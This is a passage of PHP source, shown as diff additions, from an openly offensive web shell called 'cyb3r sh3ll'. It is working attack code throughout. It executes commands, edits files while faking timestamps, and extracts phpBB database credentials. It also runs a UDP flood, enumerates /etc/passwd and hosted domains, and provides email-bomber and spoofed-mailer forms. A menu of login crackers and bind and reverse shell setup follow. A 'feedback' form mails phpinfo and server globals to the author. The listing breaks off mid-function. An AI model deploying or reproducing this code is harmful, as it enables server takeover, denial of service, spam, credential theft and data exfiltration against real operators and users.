+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+
+  }
+
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+
+  elseif ($ft == "code")
+
+  {
+
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+
+   {
+
+    $arr = explode("\n",$r);
+
+    if (count($arr == 18))
+
+    {
+
+     include($d.$f);
+
+     echo "<b>phpBB configuration is detected in this file!<br>";
+
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";}
+
+     echo "Parameters for manual connect:<br>";
+
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+
+     echo "</b><hr size=\"1\" noshade>";
+
+    }
+
+   }
+
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+
+   if (!empty($white)) {@ob_clean();}
+
+   highlight_file($d.$f);
+
+   if (!empty($white)) {cyb3rexit();}
+
+   echo "</div>";
+
+  }
+
+  elseif ($ft == "download")
+
+  {
+
+   @ob_clean();
+
+   header("Content-type: application/octet-stream");
+
+   header("Content-length: ".filesize($d.$f));
+
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+
+   echo $r;
+
+   exit;
+
+  }
+
+  elseif ($ft == "notepad")
+
+  {
+
+   @ob_clean();
+
+   header("Content-type: text/plain");
+
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+
+   echo($r);
+
+   exit;
+
+  }
+
+  elseif ($ft == "img")
+
+  {
+
+   $inf = getimagesize($d.$f);
+
+   if (!$white)
+
+   {
+
+    if (empty($imgsize)) {$imgsize = 20;}
+
+    $width = $inf[0]/100*$imgsize;
+
+    $height = $inf[1]/100*$imgsize;
+
+    echo "<center><b>Size:</b>&nbsp;";
+
+    $sizes = array("100","50","20");
+
+    foreach ($sizes as $v)
+
+    {
+
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+
+     if ($imgsize != $v ) {echo $v;}
+
+     else {echo "<u>".$v."</u>";}
+
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+
+    }
+
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+
+   }
+
+   else
+
+   {
+
+    @ob_clean();
+
+    $ext = explode($f,".");
+
+    $ext = $ext[count($ext)-1];
+
+    header("Content-type: ".$inf["mime"]);
+
+    readfile($d.$f);
+
+    exit;
+
+   }
+
+  }
+
+  elseif ($ft == "edit")
+
+  {
+
+   if (!empty($submit))
+
+   {
+
+    if ($filestealth) {$stat = stat($d.$f);}
+
+    $fp = fopen($d.$f,"w");
+
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+
+    else
+
+    {
+
+     echo "<b>Saved!</b>";
+
+     fwrite($fp,$edit_text);
+
+     fclose($fp);
+
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+
+     $r = $edit_text;
+
+    }
+
+   }
+
+   $rows = count(explode("\r\n",$r));
+
+   if ($rows < 10) {$rows = 10;}
+
+   if ($rows > 30) {$rows = 30;}
+
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+
+  }
+
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+
+ }
+
+}
+
+if ($act == "about") 
+{
+echo '<table align="center"><tr><td><b><font color="orange">Script:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>
+Name: cyb3r sh3ll<br>Version: '.$shver.'</font><br/><br/>Author:<br>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br>
+Name: cyb3r 9l4d!470r (Cyber Gladiator)<br>Country: India<br>Website: ????...<br>Email: cyb3r.gladiat0r@gmail.com 
+<a href="mailto:cyb3r.gladiat0r@gmail.com"></a><br/><br/><font color="green">Greetings:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>r45c4l bro you are my source of inspiration.<br/>r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.<br/>Thanks all who report bugs and send to my email id.</font><br/></b></td></tr></table>';
+}
+
+if ($act == "dos") 
+{ 
+?><center><br><br><img src="http://s15.postimage.org/5q2io54zv/dos.png"><br>
+<b>Server IP:</b> <font color="green"><?php echo $_SERVER["SERVER_ADDR"]; ?></font><br><br>
+<b>Your IP:</b> <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
+<form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="ddos">
+IP:
+<input type="text" name="ip" size="15" maxlength="15" class="main" value = "127.0.0.1" onblur = "if ( this.value=='' ) this.value = '127.0.0.1';" onfocus = " if ( this.value == '127.0.0.1' ) this.value = '';">
+&nbsp;&nbsp;&nbsp;&nbsp;Time:
+<input type="text" name="time" size="14" maxlength="20" class="main" value = "10" onblur = "if ( this.value=='' ) this.value = '10';" onfocus = " if ( this.value == '10' ) this.value = '';">
+&nbsp;&nbsp;&nbsp;&nbsp;Port:
+<input type="text" name="port" size="5" maxlength="5" class="main" value = "80" onblur = "if ( this.value=='' ) this.value = '80';" onfocus = " if ( this.value == '80' ) this.value = '';">
+<br><br>
+<input type="submit" value="    Start the Attack--->    ">
+<br><br>
+<center>After initiating the DoS attack, please wait while the browser loads.</center></form></center><?php
+}
+
+if ($act == "ddos") 
+{
+$packets = 0;
+$ip = $_POST['ip'];
+$rand = $_POST['port'];
+set_time_limit(0);
+ignore_user_abort(FALSE);
+
+$exec_time = $_POST['time'];
+
+$time = time();
+echo "<script>alert('Dos Completed!');</script>";
+print "Flooded: $ip on port $rand <br><br>";
+$max_time = $time+$exec_time;
+
+
+
+for($i=0;$i<65535;$i++){
+        $out .= "X";
+}
+while(1){
+$packets++;
+        if(time() > $max_time){
+                break;
+        }
+        
+        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
+        if($fp){
+                fwrite($fp, $out);
+                fclose($fp);
+        }
+}
+echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
+}
+
+if ($act == "localdomain")
+{
+echo "<br><center><a href=\"".$surl."act=local\" ><b><u>Sites on this server.</u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=readable\" ><b><u>List of Users.</u></b></a></center><br>";
+}
+ 
+ if ($act == "local")
+ {
+    //radable public_html
+   $file = @implode(@file("/etc/named.conf"));
+   if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
+   preg_match_all("#named/(.*?).db#",$file ,$r);
+   $domains = array_unique($r[1]);
+
+   function check()
+       {
+            (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):"";
+       }
+
+   check();
+
+   echo "<table align=center border=1 width=59% cellpadding=5>
+         <tr><td colspan=2>[+] Here : [ <b>".count($domains)."</b> ] Domain ...</td></tr>
+         <tr><td><b>List of Domains</b></td><td><b>List of Users</b></td></tr>";
+
+   foreach($domains as $domain)
+       {
+       $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
+       echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
+       }
+
+   echo "</table>";
+//radable public_html
+ }
+ 
+ if ($act == "readable")
+ {
+       //entries in passwd file
+($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
+set_time_limit(0);
+###################
+@$passwd = fopen('/etc/passwd','r');
+if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
+$pub = array();
+$users = array();
+$conf = array();
+$i = 0;
+while(!feof($passwd))
+{
+$str = fgets($passwd);
+if ($i > 35)
+{
+$pos = strpos($str,':');
+$username = substr($str,0,$pos);
+$dirz = '/home/'.$username.'/public_html/';
+if (($username != ''))
+{
+if (is_readable($dirz))
+{
+array_push($users,$username);
+array_push($pub,$dirz);
+}
+}
+}
+$i++;
+}
+###################
+echo '<br><br><textarea class="output" >';
+echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
+echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
+echo "[~] Searching for passwords in config files...\n\n";
+foreach ($users as $user)
+{
+$path = "/home/$user/public_html/";
+echo "$path \n";
+}
+echo "\n";
+echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <- that's on the menu -> Explorer \n";
+echo "[+] Done ...\n";
+echo '</textarea><br><br>Coded by <b>cyb3r 9l4d!470r</b> <a href=#/>Homepage</a>';
+
+
+ }
+
+ 
+ if ($act == "mailer")
+ {
+    ?>   <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%"  border=1>
+     <tr> <!-- 1 -->
+           <td valign="top" width="33%" ><p align="center"><b>(: E-Mail Bomber :)</b></p></td>
+           <td valign="top" width="33%" ><p align="center"><b>[: Mass Mailer :]</b></p></td>
+           <td valign="top" ><p align="center"><b>{: Anonymous Mailer :}</b></p></td>
+         </tr>
+     <tr><!-- 2 -->
+             <td valign="top" ><center>
+                 <?php
+    if(
+        isset($_POST['to']) &&
+        isset($_POST['subject']) &&
+        isset($_POST['message']) &&
+        isset($_POST['times']) &&
+        $_POST['to'] != '' &&
+        $_POST['subject'] != '' &&
+        $_POST['message'] != '' &&
+                $_GET['act'] =='mailbomber' &&
+        $_POST['times'] != ''
+    )
+    {
+        $times = $_POST['times'];
+        while($times--)
+        {
+            if(isset($_POST['padding']))
+            {
+                $fromPadd = rand(0,9999);
+                $subjectPadd = " -- ID : ".rand(0,9999999);
+                $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
+                
+            }
+            $from = "your$fromPadd@email.id";
+            if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
+            {
+                $error = 1;
+                echo "<font color='red'>Some Error Occured!</font>";
+                break;
+            }
+        }
+        if($error != 1)
+        {    echo "<font color='green'>Mail(s) Sent!</font>";       }
+    }
+    else
+    { 
+        ?>
+        <form method="post" action ="<?php echo $surl."act=mailbomber";?>">
+                <table>
+                <tr>
+                    <td >
+                        To 
+                    </td>
+                    <td>
+                        <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com,victim@target.com,victim2@target.com';"/>
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td class="title">
+                        Subject
+                    </td>
+                    <td>
+                        <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
+                    </td>
+                </tr>
+                 <tr>
+                    <td >
+                        No. of Times  
+                    </td>
+                    <td>
+                        <input name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
+                    </td>
+                </tr>
+       
+                <tr>
+                    <td>
+                        
+                        Pad your message (Less spam detection)
+                        
+                    </td>
+                    <td>
+                    
+                        <input type="checkbox" name="padding"/>
+                          
+                    </td>
+                </tr>
+                <tr>
+                    <td >
+                        <textarea name="message" cols="25" rows="5" value="cyb3r-sh3ll Rocks!!.." onfocus="if(this.value == 'cyb3r-sh3ll Rocks!! ..')this.value = '';" onblur="if(this.value=='')this.value='cyb3r-sh3ll Rocks!! ..';">cyb3r-sh3ll Rocks!!</textarea>
+                    </td>
+                                        <td >
+                        <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
+                    </td>
+                </tr>
+                    
+                
+                
+            </table>            
+        </form>   
+        <?php
+    }
+        ?>
+                 
+                 </center></td>
+            
+                 <td valign="top"><center>
+                  <?PHP
+    if(
+        isset($_POST['to']) &&
+        isset($_POST['from']) &&
+        isset($_POST['subject']) &&
+                $_GET['act'] =='massmailer' &&
+        isset($_POST['message'])
+    )
+    {
+
+        if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
+        {
+            echo "<font color='green'>Mail Sent!</font>";
+        }
+        else
+        {
+            echo "<font color='red'>Some Error Occured!</font>";
+        }
+    }
+    else
+    {
+        ?>
+        <form method="POST" action="<?php echo $surl."act=massmailer";?>">
+            
+            <table >
+                <tr>
+                    <td >
+                        From
+                    </td>
+                    <td>
+                        <input name="from" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/>
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td >
+                        To 
+                    </td>
+                    <td>
+                        <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@target.com,victim2@target.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com';"/>
+                    </td>
+                </tr>
+                
+                <tr>
+                    <td class="title">
+                        Subject
+                    </td>
+                    <td>
+                        <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
+                    </td>
+                </tr>
+                
+                
+                <tr>
+                    <td >
+                        <textarea name="message" cols="25" rows="5" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
+                    </td>
+                                        <td >
+                        <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
+                    </td>
+                </tr>
+                
+                
+                
+            </table>            
+        </form>   
+        <?php
+    }
+
+?>
+                 </center>
+                 </td>
+                
+                <td ><center>
+                  
+ <form action="" method="post" enctype="multipart/form-data"> 
+      <table border="0" class="full"> 
+       <tr><td class="taright"><label for="fromname" accesskey="r" class="sbold">F<span class="underline">r</span>om Name:</label></td><td colspan="2"><input type="text" id="fromname" name="fromname" maxlength="100" class="full" /><label for="from" accesskey="f" class="sbold"><span class="underline">F</span>rom E-mail:</label></td><td colspan="2"><input type="text" id="from" name="from" maxlength="100" class="full" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/></td></tr> 
+       
+       <tr><td class="taright"><label for="rcpt" accesskey="o" class="sbold">T<span class="underline">o</span>:</label></td><td colspan="2"><input type="text" id="rcpt" name="rcpt" maxlength="100" class="full" /><label for="subject" accesskey="j" class="sbold">Sub<span class="underline">j</span>ect:</label></td><td colspan="2"><input type="text" id="subject" name="subject" maxlength="100" class="full"  value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';"/></td></tr> 
+   
+       <tr><td class="taright"><label for="reply" accesskey="p" class="sbold opt">Re<span class="underline">p</span>ly-To:</label></td><td colspan="2"><input type="text" id="reply" name="reply" maxlength="100" class="full" /><label for="errors" accesskey="s" class="sbold opt">Error<span class="underline">s</span>-To:</label></td><td colspan="2"><input type="text" id="errors" name="errors" maxlength="100" class="full" /></td></tr> 
+       
+       <tr><td class="taright"><label for="bcc" accesskey="b" class="sbold opt"><span class="underline">B</span>CC:</label></td><td colspan="2"><input type="text" id="bcc" name="bcc" maxlength="100" class="full" /><label for="attachment" accesskey="t" class="sbold opt">A<span class="underline">t</span>tachment:</label></td><td colspan="2"><input type="file" id="attachment" name="attachment" class="full" /></td></tr> 
+       
+       <tr><td class="taright sbold opt">Priority:</td><td colspan="2"><input type="radio" name="importance" id="lowest" value="lowest" /><label for="lowest" accesskey="w">&nbsp;Lo<span class="underline">w</span></label><input type="radio" name="importance" id="normal" value="normal" class="rbtn" checked="checked" /><label for="normal" accesskey="m">&nbsp;Nor<span class="underline">m</span>al</label><input type="radio" name="importance" id="highest" value="highest" class="rbtn" /><label for="highest" accesskey="g">&nbsp;Hi<span class="underline">g</span>h</label></td></tr>
+           
+       <tr><td class="vatop taright"><label for="xmailer" accesskey="l" class="sbold opt"><span id="mailer">X-Mai<span class="underline">l</span>er:</span></label></td><td colspan="2"> 
+         <select name="xmailer" id="xmailer"> 
+          <option value="0" selected="selected">- none -</option> 
+          <option value="1">Apple Mail</option> 
+          <option value="2">ColdFusion MX Application Server</option> 
+          <option value="3">E-Messenger</option> 
+          <option value="4">KMail</option> 
+
+          <option value="5">Lotus Notes</option> 
+          <option value="6">Microsoft Office Outlook</option> 
+          <option value="7">Microsoft Outlook Express</option> 
+          <option value="8">Microsoft Outlook IMO</option> 
+          <option value="9">Microsoft Windows Live Mail</option> 
+          <option value="10">Microsoft Windows Mail</option> 
+          <option value="11">Mozilla Thunderbird</option> 
+          <option value="12">Novell GroupWise</option> 
+          <option value="13">Novell GroupWise Internet Agent</option> 
+          <option value="14">QUALCOMM Windows Eudora Version</option> 
+          <option value="15">The Bat!</option> 
+          <option value="16">YahooMailClassic YahooMailWebService</option> 
+          <option value="99">Custom...</option> 
+         </select> 
+         
+        </td></tr> 
+
+       <tr><td class="taright"><label for="date" accesskey="d" class="sbold opt"><span class="underline">D</span>ate:</label></td><td colspan="2"><input type="text" id="date" name="date" maxlength="50" value="Thu, 10 Nov 2011 18:41:04 +0100" class="datewidth" />&nbsp;<input type="checkbox" id="current" name="current" checked="checked" /><label for="current" accesskey="u">&nbsp;C<span class="underline">u</span>rrent</label></td></tr> 
+       <tr><td class="taright"><label for="charset" accesskey="a" class="sbold opt">Ch<span class="underline">a</span>rset:</label></td><td class="cchs"> 
+         <select name="charset" id="charset" class="full"> 
+          <option value="big5">big5</option> 
+          <option value="euc-kr">euc-kr</option> 
+          <option value="iso-2202-jp">iso-2202-jp</option> 
+          <option value="iso-8859-1">iso-8859-1</option> 
+          <option value="iso-8859-2">iso-8859-2</option> 
+          <option value="iso-8859-3">iso-8859-3</option> 
+          <option value="iso-8859-4">iso-8859-4</option> 
+          <option value="iso-8859-5">iso-8859-5</option> 
+          <option value="iso-8859-6">iso-8859-6</option> 
+          <option value="iso-8859-7">iso-8859-7</option> 
+          <option value="iso-8859-8">iso-8859-8</option> 
+          <option value="koi8-r">koi8-r</option> 
+          <option value="shift-jis">shift-jis</option> 
+          <option value="utf-8" selected="selected">utf-8</option> 
+          <option value="windows-1250">windows-1250</option> 
+          <option value="windows-1251">windows-1251</option> 
+          <option value="windows-1252">windows-1252</option> 
+          <option value="windows-1253">windows-1253</option> 
+          <option value="windows-1254">windows-1254</option> 
+          <option value="windows-1255">windows-1255</option> 
+          <option value="windows-1256">windows-1256</option> 
+          <option value="windows-1257">windows-1257</option> 
+          <option value="windows-1258">windows-1258</option> 
+          <option value="windows-874">windows-874</option> 
+          <option value="x-euc">x-euc</option> 
+          <option value="99">Custom...</option> 
+         </select> 
+        </td><td><input type="text" name="mycharset" maxlength="50" class="full" /></td></tr> 
+       <tr><td class="taright sbold opt">Content-Type:</td><td colspan="2"><input type="radio" name="ctype" id="plain" value="plain" checked="checked" /><label for="plain" accesskey="n">&nbsp;text/plai<span class="underline">n</span></label><input type="radio" name="ctype" id="html" value="html" class="rbtn" /><label for="html" accesskey="h" id="mrk">&nbsp;text/<span class="underline">h</span>tml</label><input type="hidden" name="rte" value="0" /></td></tr> 
+       <tr><td class="vatop taright"><label for="text" accesskey="x" class="sbold">Te<span class="underline">x</span>t:</label></td><td colspan="2"><textarea cols="30" rows="5" id="text" name="text" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';" />I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea></td></tr> 
+         <tr><td></td><td colspan="2"><input type="reset" value="Clear" class="btn" /> <input type="submit" name="ok" value="Send" class="btn sbold slarger" /></td></tr> 
+      </table> 
+     </form> 
+
+                </center></td>
+                
+         </tr>
+     
+ </table>       <?php
+ }
+ 
+ if ($act == "nettools")
+{
+echo "<br><center><a href=\"".$surl."act=proxy\" ><b><u>Proxy </u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=whois\" ><b><u>Whois </u></b></a></center><br>";
+}
+ 
+ if ($act == "feedback")
+
+{
+
+ $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ==");
+
+ if (!empty($submit))
+
+ {
+
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+
+  $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+
+  if (!empty($fdbk_ref))
+
+  {
+
+   $tmp = @ob_get_contents();
+
+   ob_clean();
+
+   phpinfo();
+
+   $phpinfo = base64_encode(ob_get_contents());
+
+   ob_clean();
+
+   echo $tmp;
+
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+
+  }
+
+  mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+
+ }
+
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Hindi.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+
+}
+
+if ($act == "systeminfo") {echo system('systeminfo');}
+
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); }
+
+if ($act == "upload")
+
+{
+  echo "<b>File upload:</b><br><form enctype=\"multipart/form-data\" action=\"\" method=POST>
+
+Select file on your local computer: <input name=\"uploaded\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+
+Save this file dir: <input name=\"path\" size=\"70\" value=\"".getcwd()."\"><br><br>
+
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+
+<input type=submit name=submit value=\"Upload\">
+
+</form>";
+$target = $_POST['path']; 
+ $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ; 
+ $ok=1; 
+if (isset($_FILES['uploaded']['name'])) {
+  if (file_exists($target))
+      {
+      echo $_FILES["uploaded"]["name"] . " already exists. ";
+      }
+    else   
+      {
+        if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) 
+          { 
+            echo "Upload: " . $_FILES["uploaded"]["name"] . "<br />";
+            echo "Type: " . $_FILES["uploaded"]["type"] . "<br />";
+            echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb<br />";
+            echo "Stored in: " . $target;
+          } 
+        else 
+         { 
+           echo "Sorry, there was a problem uploading your file."; 
+         } 
+      }
+ }
+}
+if ($act == "whois")
+{
+global $t,$hcwd;
+if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
+$server =$_REQUEST['server'];
+$domain=$_REQUEST['domain']."\r\n";
+$ser=fsockopen($server,43,$en,$es,5);
+fputs($ser,$domain);
+echo "<pre>";
+while(!feof($ser))echo fgets($ser);
+echo "</pre>";
+fclose($ser);
+}
+else{
+echo "<center><table width=\"50%\">Whois:<form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
+}
+}
+
+
+
+if ($act == "cracker")
+{
+ echo "
+<br><center>
+<a href=\"".$surl."act=hash\" >Hash</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=smtp\" >SMTP</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=pop3\" >POP3</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=imap\" >IMAP</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=ftp\" >FTP</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=snmp\" >SNMP</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=mysql\" >MySQL</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=htmlform\" >HTTP Form</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=basicauth\" >HTTP Auth(basic)</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=cpanel\" >CPANEL</a><font color='silver'> -|- </font>
+<a href=\"".$surl."act=dic\" >Dictionary Maker</a>
+</center><br>";
+}
+
+if ($act == "shells") 
+{ ?>
+<TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%"  border=1>
+     <tr> <!-- 1 -->
+           <td valign="top" width="50%" ><p align="center"><b>(: Bind/Reverse Shell :)</b></p></td>
+           <td valign="top" ><p align="center"><b>[: Web Shell :]</b></p></td>
+          
+         </tr>
+     <tr><!-- 2 -->
+             <td valign="top" ><center>
+            <?php
+
+ $bndportsrcs = array(
+
+  "cyb3r_bindport.pl"=>array("Using PERL","perl %path %port"),
+
+  "cyb3r_bindport.c"=>array("Using C","%path %port %pass")
+
+ );
+
+ $bcsrcs = array(
+
+  "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+
+  "cyb3r_backconn.c"=>array("Using C","%path %host %port")
+
+ );
+
+ $dpsrcs = array(
+
+  "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+
+  "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+
+ );
+
+ if (!is_array($bind)) {$bind = array();}
+
+ if (!is_array($bc)) {$bc = array();}
+
+ if (!is_array($datapipe)) {$datapipe = array();}
+
+ 
+
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+
+  
+
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+
+ 
+
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+
+ if (!empty($bindsubmit))
+
+ {
+
+  echo "<b>Result of binding port:</b><br>";
+
+  $v = $bndportsrcs[$bind["src"]];
+
+  if (empty($v)) {echo "Unknown file!<br>";}
+
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+
+  else
+
+  {
